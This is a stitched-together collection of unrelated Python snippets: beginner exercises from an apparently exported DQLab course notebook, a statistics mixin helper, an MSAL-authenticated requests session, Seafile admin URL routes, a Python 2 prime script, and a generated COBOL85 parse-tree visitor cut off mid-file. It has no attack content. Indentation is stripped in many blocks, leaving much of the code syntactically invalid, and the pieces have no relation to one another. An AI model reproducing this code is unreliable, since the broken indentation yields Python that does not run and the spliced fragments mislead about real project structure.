# # [IF Statement](https://academy.dqlab.id/main/livecode/45/111/529)
# In[4]:
i = 7 # initialize variable i with the value 7
if(i==10): # check whether the value of i equals 10
    print("ini adalah angka 10") # if TRUE, this sentence is printed
# # [IF … ELSE …](https://academy.dqlab.id/main/livecode/45/111/530)
# In[5]:
i = 5 # initialize variable i with the value 5
if(i==10): # check whether the value of i equals 10
    print("ini adalah angka 10") # if TRUE, this sentence is printed
else:
    print("bukan angka 10") # if FALSE, this sentence is printed
# # [IF … ELIF … ELSE ….](https://academy.dqlab.id/main/livecode/45/111/531)
# In[6]:
i=3
if(i==5):
print("ini adalah angka 5")
elif(i>5):
print("lebih besar dari 5")
else:
print("lebih kecil dari 5")
# # [NESTED IF](https://academy.dqlab.id/main/livecode/45/111/532)
# In[7]:
if (i<7):
print("nilai i kurang dari 7")
if (i<3):
print("nilai i kurang dari 7 dan kurang dari 3")
else:
print("nilai i kurang dari 7 tapi lebih dari 3")
# # [Arithmetic Operations Practice](https://academy.dqlab.id/main/livecode/45/112/534)
# In[8]:
a=10
b=5
selisih = a-b
jumlah = a+b
kali = a*b
bagi = a/b
print("Hasil penjumlahan dan b adalah", jumlah)
print("Selisih a dan b adalah :",selisih)
print("Hasil perkalian a dan b adalah :",kali)
print("Hasil pembagian a dan b adalah:",bagi)
# # [Modulus Operation](https://academy.dqlab.id/main/livecode/45/112/536)
# In[9]:
c=10
d=3
modulus=c%d
print("Hasil modulus",modulus)
# # [Mid-Course Practice Task](https://academy.dqlab.id/main/livecode/45/112/538)
# In[10]:
angka=5
if(angka%2 == 0):
print("angka termasuk bilangan genap")
else:
print("angka termasuk bilangan ganjil")
# # [while](https://academy.dqlab.id/main/livecode/45/113/540)
# In[11]:
j = 0 # initial value j = 0
while j<6: # loop while j is less than 6; otherwise stop
    print("Ini adalah perulangan ke -",j) # executed on each iteration
    j=j+1 # at the end of each iteration, increase j by 1
# # [for (1)](https://academy.dqlab.id/main/livecode/45/113/542)
# In[12]:
for i in range (1,6): # for loop over the numbers from 1 up to (but not including) 6
    print("Ini adalah perulangan ke -", i) # executed on each iteration of the loop
# # [for (2) with access element](https://academy.dqlab.id/main/livecode/45/113/543)
# In[13]:
for i in range (1,11):
if(i%2 == 0):
print("Angka genap",i)
else:
print("Angka ganjil",i)
# # [Creating Your Own Function](https://academy.dqlab.id/main/livecode/45/114/545)
# In[14]:
# Define a function
def salam():
print("Hello, Selamat Pagi")
## Call the function
salam()
# # [Function Parameters](https://academy.dqlab.id/main/livecode/45/114/546)
# In[15]:
def luas_segitiga(alas, tinggi): # alas (base) and tinggi (height) are the incoming parameters
    luas = (alas * tinggi) / 2
    print("Luas segitiga: %f" % luas)
# Call the function
## 4 and 6 are the arguments passed into the luas_segitiga function
luas_segitiga(4, 6)
# # [Function with a Return Value](https://academy.dqlab.id/main/livecode/45/114/547)
# In[16]:
def luas_segitiga(alas, tinggi): # alas (base) and tinggi (height) are the incoming parameters
luas = (alas * tinggi) / 2
return luas
# Call the function
## 4 and 6 are the arguments passed into the luas_segitiga function
print("Luas segitiga: %d" % luas_segitiga(4, 6))
# # [Importing Packages and Using Modules](https://academy.dqlab.id/main/livecode/45/115/549)
# In[17]:
import math
print("Nilai pi adalah:", math.pi)# math.pi merupakan sintak untuk memanggil fungsi
# # [Importing with a Module Rename or Alias](https://academy.dqlab.id/main/livecode/45/115/550)
# In[18]:
import math as m # using m as a module rename or alias
print("Nilai pi adalah:", m.pi) # m.pi accesses pi through the alias
# # [Importing Part of a Module](https://academy.dqlab.id/main/livecode/45/115/560)
# In[19]:
from math import pi
print("Nilai pi adalah", pi)
# # [Importing All Module Contents](https://academy.dqlab.id/main/livecode/45/115/561)
# In[20]:
from math import *
print("Nilai e adalah:", e)
# # [Reading a Text File (CSV)](https://academy.dqlab.id/main/livecode/45/116/552)
# In[22]:
import csv
# set the file location and name, and initialize the csv reader
f = open('penduduk_gender_head.csv', 'r')
reader = csv.reader(f)
# read row by row
for row in reader:
print (row)
# close the csv file
f.close()
# # [Reading a CSV File with PANDAS](https://academy.dqlab.id/main/livecode/45/116/553)
# In[23]:
import pandas as pd
table = pd.read_csv("https://academy.dqlab.id/dataset/penduduk_gender_head.csv")
table.head()
print(table)
# # [Bar Chart](https://academy.dqlab.id/main/livecode/45/117/555)
# In[24]:
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
table = pd.read_csv("https://academy.dqlab.id/dataset/penduduk_gender_head.csv")
table.head()
x_label = table['NAMA KELURAHAN']
plt.bar(x=np.arange(len(x_label)),height=table['LAKI-LAKI WNI'])
plt.show()
# # [Chart Parameters (Setting Axis Values from the CSV Data)](https://academy.dqlab.id/main/livecode/45/117/556)
# In[25]:
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
table = pd.read_csv("https://academy.dqlab.id/dataset/penduduk_gender_head.csv")
table.head()
x_label = table['NAMA KELURAHAN']
plt.bar(x=np.arange(len(x_label)),height=table['LAKI-LAKI WNI'])
plt.xticks(np.arange(len(x_label)), table['NAMA KELURAHAN'], rotation=30)
plt.show()
# # [Adding a Title and Labels to the Chart](https://academy.dqlab.id/main/livecode/45/117/557)
# In[26]:
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
table = pd.read_csv("https://academy.dqlab.id/dataset/penduduk_gender_head.csv")
table.head()
x_label = table['NAMA KELURAHAN']
plt.bar(x=np.arange(len(x_label)),height=table['LAKI-LAKI WNI'])
plt.xticks(np.arange(len(x_label)), table['NAMA KELURAHAN'], rotation=90)
plt.xlabel('Kelurahan di Jakarta Pusat')
plt.ylabel('Jumlah Penduduk Laki - Laki')
plt.title('Persebaran Jumlah Penduduk Laki-Laki di Jakarta Pusat')
plt.show()
|
import hotstepper.analysis.statistics as s
import hotstepper.analysis.Sequency as Sequency
to_add = [
s.pacf,
s.acf,
s.ecdf,
s.histogram,
s.span_and_weights,
s.mean_integrate,
s.mean,
s.var,
s.std,
s.integrate,
s.percentile,
s.min,
s.max,
s.mode,
s.median,
s.covariance,
s.correlation,
s.describe,
s.rolling_function_step
]
def apply_mixins(cls):
for a in to_add:
setattr(cls,a.__name__,a)
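# Illustrative usage (class name hypothetical): apply_mixins(Steps) attaches
# each function in ``to_add`` as a method under its own __name__, so instances
# gain e.g. ``my_steps.mean()`` and ``my_steps.describe()``.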
|
"""The apns component."""
|
import requests
from .requests_auth import MsalAuth
class MsalSession(requests.Session):
def __init__(self, token_acquirer, proxies=None):
super().__init__()
self.auth = MsalAuth(token_acquirer)
self.proxies = proxies
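# Usage sketch (token_acquirer is whatever object MsalAuth expects; assumed here):
#
#     session = MsalSession(token_acquirer)
#     resp = session.get("https://graph.microsoft.com/v1.0/me")  # MSAL auth header attached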
|
# Copyright (c) 2012-2016 Seafile Ltd.
from django.conf.urls import patterns, url
from .views import (info, useradmin, user_info, user_remove, useradmin_search,
user_toggle_status, user_set_quota)
urlpatterns = patterns(
'',
    url(r'^info/$', info, name="info"),
    url(r'^useradmin/$', useradmin, name="useradmin"),
url(r'^useradmin/info/(?P<email>[^/]+)/$', user_info, name='user_info'),
url(r'^useradmin/remove/(?P<email>[^/]+)/$', user_remove, name='user_remove'),
    url(r'^useradmin/search/$', useradmin_search, name="useradmin_search"),
url(r'^useradmin/set_quota/(?P<email>[^/]+)/$', user_set_quota, name='user_set_quota'),
url(r'^useradmin/toggle_status/(?P<email>[^/]+)/$', user_toggle_status, name='user_toggle_status'),
)
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
i = 2
while(i < 100):
j = 2
while(j <= (i/j)):
if not(i%j): break
j = j + 1
    if (j > i/j) : print i, " is a prime number"
i = i + 1
print "Good bye!"
|
# Generated from Cobol85.g4 by ANTLR 4.7.1
from antlr4 import *
# This class defines a complete generic visitor for a parse tree produced by Cobol85Parser.
class Cobol85Visitor(ParseTreeVisitor):
# Visit a parse tree produced by Cobol85Parser#startRule.
def visitStartRule(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#compilationUnit.
def visitCompilationUnit(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#programUnit.
def visitProgramUnit(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#endProgramStatement.
def visitEndProgramStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#identificationDivision.
def visitIdentificationDivision(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#identificationDivisionBody.
def visitIdentificationDivisionBody(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#programIdParagraph.
def visitProgramIdParagraph(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#authorParagraph.
def visitAuthorParagraph(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#installationParagraph.
def visitInstallationParagraph(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dateWrittenParagraph.
def visitDateWrittenParagraph(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dateCompiledParagraph.
def visitDateCompiledParagraph(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#securityParagraph.
def visitSecurityParagraph(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#remarksParagraph.
def visitRemarksParagraph(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#environmentDivision.
def visitEnvironmentDivision(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#environmentDivisionBody.
def visitEnvironmentDivisionBody(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#configurationSection.
def visitConfigurationSection(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#configurationSectionParagraph.
def visitConfigurationSectionParagraph(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sourceComputerParagraph.
def visitSourceComputerParagraph(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#objectComputerParagraph.
def visitObjectComputerParagraph(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#objectComputerClause.
def visitObjectComputerClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#memorySizeClause.
def visitMemorySizeClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#diskSizeClause.
def visitDiskSizeClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#collatingSequenceClause.
def visitCollatingSequenceClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#collatingSequenceClauseAlphanumeric.
def visitCollatingSequenceClauseAlphanumeric(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#collatingSequenceClauseNational.
def visitCollatingSequenceClauseNational(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#segmentLimitClause.
def visitSegmentLimitClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#characterSetClause.
def visitCharacterSetClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#specialNamesParagraph.
def visitSpecialNamesParagraph(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#specialNameClause.
def visitSpecialNameClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#alphabetClause.
def visitAlphabetClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#alphabetClauseFormat1.
def visitAlphabetClauseFormat1(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#alphabetLiterals.
def visitAlphabetLiterals(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#alphabetThrough.
def visitAlphabetThrough(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#alphabetAlso.
def visitAlphabetAlso(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#alphabetClauseFormat2.
def visitAlphabetClauseFormat2(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#channelClause.
def visitChannelClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#classClause.
def visitClassClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#classClauseThrough.
def visitClassClauseThrough(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#classClauseFrom.
def visitClassClauseFrom(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#classClauseTo.
def visitClassClauseTo(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#currencySignClause.
def visitCurrencySignClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#decimalPointClause.
def visitDecimalPointClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#defaultComputationalSignClause.
def visitDefaultComputationalSignClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#defaultDisplaySignClause.
def visitDefaultDisplaySignClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#environmentSwitchNameClause.
def visitEnvironmentSwitchNameClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#environmentSwitchNameSpecialNamesStatusPhrase.
def visitEnvironmentSwitchNameSpecialNamesStatusPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#odtClause.
def visitOdtClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reserveNetworkClause.
def visitReserveNetworkClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#symbolicCharactersClause.
def visitSymbolicCharactersClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#symbolicCharacters.
def visitSymbolicCharacters(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inputOutputSection.
def visitInputOutputSection(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inputOutputSectionParagraph.
def visitInputOutputSectionParagraph(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#fileControlParagraph.
def visitFileControlParagraph(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#fileControlEntry.
def visitFileControlEntry(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#selectClause.
def visitSelectClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#fileControlClause.
def visitFileControlClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#assignClause.
def visitAssignClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reserveClause.
def visitReserveClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#organizationClause.
def visitOrganizationClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#paddingCharacterClause.
def visitPaddingCharacterClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#recordDelimiterClause.
def visitRecordDelimiterClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#accessModeClause.
def visitAccessModeClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#recordKeyClause.
def visitRecordKeyClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#alternateRecordKeyClause.
def visitAlternateRecordKeyClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#passwordClause.
def visitPasswordClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#fileStatusClause.
def visitFileStatusClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#relativeKeyClause.
def visitRelativeKeyClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#ioControlParagraph.
def visitIoControlParagraph(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#ioControlClause.
def visitIoControlClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#rerunClause.
def visitRerunClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#rerunEveryRecords.
def visitRerunEveryRecords(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#rerunEveryOf.
def visitRerunEveryOf(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#rerunEveryClock.
def visitRerunEveryClock(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sameClause.
def visitSameClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#multipleFileClause.
def visitMultipleFileClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#multipleFilePosition.
def visitMultipleFilePosition(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#commitmentControlClause.
def visitCommitmentControlClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataDivision.
def visitDataDivision(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataDivisionSection.
def visitDataDivisionSection(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#fileSection.
def visitFileSection(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#fileDescriptionEntry.
def visitFileDescriptionEntry(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#fileDescriptionEntryClause.
def visitFileDescriptionEntryClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#externalClause.
def visitExternalClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#globalClause.
def visitGlobalClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#blockContainsClause.
def visitBlockContainsClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#blockContainsTo.
def visitBlockContainsTo(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#recordContainsClause.
def visitRecordContainsClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#recordContainsClauseFormat1.
def visitRecordContainsClauseFormat1(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#recordContainsClauseFormat2.
def visitRecordContainsClauseFormat2(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#recordContainsClauseFormat3.
def visitRecordContainsClauseFormat3(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#recordContainsTo.
def visitRecordContainsTo(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#labelRecordsClause.
def visitLabelRecordsClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#valueOfClause.
def visitValueOfClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#valuePair.
def visitValuePair(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataRecordsClause.
def visitDataRecordsClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#linageClause.
def visitLinageClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#linageAt.
def visitLinageAt(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#linageFootingAt.
def visitLinageFootingAt(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#linageLinesAtTop.
def visitLinageLinesAtTop(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#linageLinesAtBottom.
def visitLinageLinesAtBottom(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#recordingModeClause.
def visitRecordingModeClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#modeStatement.
def visitModeStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#codeSetClause.
def visitCodeSetClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportClause.
def visitReportClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataBaseSection.
def visitDataBaseSection(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataBaseSectionEntry.
def visitDataBaseSectionEntry(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#workingStorageSection.
def visitWorkingStorageSection(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#linkageSection.
def visitLinkageSection(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#communicationSection.
def visitCommunicationSection(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#communicationDescriptionEntry.
def visitCommunicationDescriptionEntry(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#communicationDescriptionEntryFormat1.
def visitCommunicationDescriptionEntryFormat1(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#communicationDescriptionEntryFormat2.
def visitCommunicationDescriptionEntryFormat2(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#communicationDescriptionEntryFormat3.
def visitCommunicationDescriptionEntryFormat3(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#destinationCountClause.
def visitDestinationCountClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#destinationTableClause.
def visitDestinationTableClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#endKeyClause.
def visitEndKeyClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#errorKeyClause.
def visitErrorKeyClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#messageCountClause.
def visitMessageCountClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#messageDateClause.
def visitMessageDateClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#messageTimeClause.
def visitMessageTimeClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#statusKeyClause.
def visitStatusKeyClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#symbolicDestinationClause.
def visitSymbolicDestinationClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#symbolicQueueClause.
def visitSymbolicQueueClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#symbolicSourceClause.
def visitSymbolicSourceClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#symbolicTerminalClause.
def visitSymbolicTerminalClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#symbolicSubQueueClause.
def visitSymbolicSubQueueClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#textLengthClause.
def visitTextLengthClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#localStorageSection.
def visitLocalStorageSection(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenSection.
def visitScreenSection(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionEntry.
def visitScreenDescriptionEntry(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionBlankClause.
def visitScreenDescriptionBlankClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionBellClause.
def visitScreenDescriptionBellClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionBlinkClause.
def visitScreenDescriptionBlinkClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionEraseClause.
def visitScreenDescriptionEraseClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionLightClause.
def visitScreenDescriptionLightClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionGridClause.
def visitScreenDescriptionGridClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionReverseVideoClause.
def visitScreenDescriptionReverseVideoClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionUnderlineClause.
def visitScreenDescriptionUnderlineClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionSizeClause.
def visitScreenDescriptionSizeClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionLineClause.
def visitScreenDescriptionLineClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionColumnClause.
def visitScreenDescriptionColumnClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionForegroundColorClause.
def visitScreenDescriptionForegroundColorClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionBackgroundColorClause.
def visitScreenDescriptionBackgroundColorClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionControlClause.
def visitScreenDescriptionControlClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionValueClause.
def visitScreenDescriptionValueClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionPictureClause.
def visitScreenDescriptionPictureClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionFromClause.
def visitScreenDescriptionFromClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionToClause.
def visitScreenDescriptionToClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionUsingClause.
def visitScreenDescriptionUsingClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionUsageClause.
def visitScreenDescriptionUsageClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionBlankWhenZeroClause.
def visitScreenDescriptionBlankWhenZeroClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionJustifiedClause.
def visitScreenDescriptionJustifiedClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionSignClause.
def visitScreenDescriptionSignClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionAutoClause.
def visitScreenDescriptionAutoClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionSecureClause.
def visitScreenDescriptionSecureClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionRequiredClause.
def visitScreenDescriptionRequiredClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionPromptClause.
def visitScreenDescriptionPromptClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionPromptOccursClause.
def visitScreenDescriptionPromptOccursClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionFullClause.
def visitScreenDescriptionFullClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenDescriptionZeroFillClause.
def visitScreenDescriptionZeroFillClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportSection.
def visitReportSection(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportDescription.
def visitReportDescription(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportDescriptionEntry.
def visitReportDescriptionEntry(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportDescriptionGlobalClause.
def visitReportDescriptionGlobalClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportDescriptionPageLimitClause.
def visitReportDescriptionPageLimitClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportDescriptionHeadingClause.
def visitReportDescriptionHeadingClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportDescriptionFirstDetailClause.
